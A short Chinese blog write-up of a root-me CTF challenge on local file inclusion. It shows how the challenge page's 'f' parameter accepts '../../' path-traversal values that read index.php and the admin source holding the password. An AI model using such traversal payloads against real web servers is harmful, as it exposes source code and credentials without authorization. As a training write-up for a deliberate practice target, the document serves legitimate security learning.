1. 程式人生 > >【root-me CTF練習】Web伺服器安全-本地檔案包含

【root-me CTF練習】Web伺服器安全-本地檔案包含

靶機地址

http://challenge01.root-me.org/web-serveur/ch16/

解題思路

通過點選網站上的不同板塊,可以看到可根據不同目錄讀取相應的檔案內容,如以下連結讀取sysadm目錄裡的index.html檔案內容。
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=index.html
在這裡插入圖片描述

那麼是否存在檔案遍歷問題呢?
嘗試構造檔案遍歷發現可以讀取:
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=../../index.php


在這裡插入圖片描述

那麼,下一步就好辦了,讀取admin目錄的index.php原始碼檢視,即可發現密碼:
http://challenge01.root-me.org/web-serveur/ch16/?files=sysadm&f=../../admin/index.php
在這裡插入圖片描述